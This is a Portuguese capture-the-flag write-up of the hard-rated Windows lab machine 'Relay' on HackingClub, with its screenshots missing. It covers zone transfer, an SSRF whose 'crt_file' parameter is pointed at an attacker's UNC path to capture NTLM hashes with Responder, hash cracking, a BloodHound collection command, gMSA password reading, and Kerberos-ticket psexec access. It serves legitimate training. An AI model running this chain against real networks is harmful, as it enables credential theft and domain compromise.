HackingClub Relay Write-up
Resolução da maquina Relay do Hackinclub.
| ||
A máquina Relay pertence ao Hackingclub, para poder ter acesso a essa máquina é necessário assinar o Hackingclub. | ||
A máquina está classificada como nível Difícil e seu sistema operacional é Windows. | ||
Reconhecimento | ||
Primeira etapa é fazer o reconhecimento inicial de portas e serviços disponíveis no alvo. Para essa finalidade utilizaremos a ferramenta Nmap. | ||
Nmap -sS -sV -v <IP> | ||
Resultado: | ||
| ||
Identificamos os serviços e as portas disponíveis, como também o nome do domínio relay.uhclabs. | ||
Adicione no / etc/ hosts. | ||
| ||
Verificaremos se o servidor DNS permite transferência de zona com o utilitário dig, comando: | ||
dig axfr relay.uhclabs @relay.uhclabs | ||
Resultado: | ||
| ||
Identificamos que o servidor permite transferência de zona. | ||
Nos utilizaremos o subdomínio ‘cert.relay.uhclabs’. | ||
Salve no / etc/ hosts | ||
| ||
Acessaremos o subdomínio pelo browser | ||
Resultado: | ||
| ||
Servidor retornou uma mensagem que precisamos definir o valor do parâmetro “crt_file”. | ||
Iniciaremos um servidor Python. | ||
| ||
Definiremos o parâmetro com a url pertencente ao nosso servidor. | ||
| ||
Enviamos a requisição. | ||
Resultado: | ||
| ||
Encontramos a vulnerabilidade de Server-Side Request Forgery(SSRF). | ||
Exploração | ||
Utilizaremos a ferramenta Responder para tentar capturar alguma credencial. | ||
| ||
No parâmetro vulnerável ‘crt_file’ colocaremos \\<Seu-IP>/tantofaz para o servidor tentar conectar-se a um suposto serviço do Samba, enviamos a requisição. | ||
Retornando ao responder temos o seguinte resultado. | ||
Resultado: | ||
| ||
O alvo está vulnerável a NTLM Relay Attack, conseguimos capturar nome de usuário e hash de senha. | ||
Salvaremos o Hash em um arquivo e iniciaremos a ‘quebra’ com o John the ripper | ||
| ||
Resultado: | ||
| ||
Utilizaremos a ferramenta ldapdomaindump para coletar todos os objetos do domínio e salvar em nossa máquina. | ||
| ||
Foram salvos esses arquivos presentes na imagem a baixo, contendo informações sobre o active directory. | ||
Resultado: | ||
| ||
Iniciaremos servidor HTTP python para melhor leitura. | ||
Resultado: | ||
| ||
Acessando o domain_users.html. | ||
| ||
Encontramos a Primeira Flag. | ||
| ||
Utilizaremos a ferramenta Bloodhound para entendermos como podemos obter acesso a máquina. | ||
bloodhound-python -u op -p <password> -ns 172.31.17.35 -d relay.uhclabs -c all | ||
Resultado: | ||
| ||
Foram salvos esses arquivos .json presentes na imagem a baixo, contendo informações sobre o active directory | ||
| ||
Selecione os arquivos, abra no bloodhound e selecione a opção “Find Shortest Paths To Domain Admins”. | ||
| ||
Resultado: | ||
| ||
O usuário OP pode ler senha GMSA do usuário svc_webapp. | ||
Utilizaremos o acesso do usuário op para ler o GMSA password. | ||
| ||
Hash capturado, então usaremos o hash e o usuário capturado para obter um ticket no kerberos para acessar a máquina alvo. | ||
| ||
Ticket salvo. | ||
Exportaremos a variável “KRB5CCNAME” para o psexec encontrar o ticket que foi salvo. | ||
| ||
Utilizaremos o psexec com o ticket para pegar uma shell. | ||
| ||
E capturamos a última flag. | ||
| ||
|
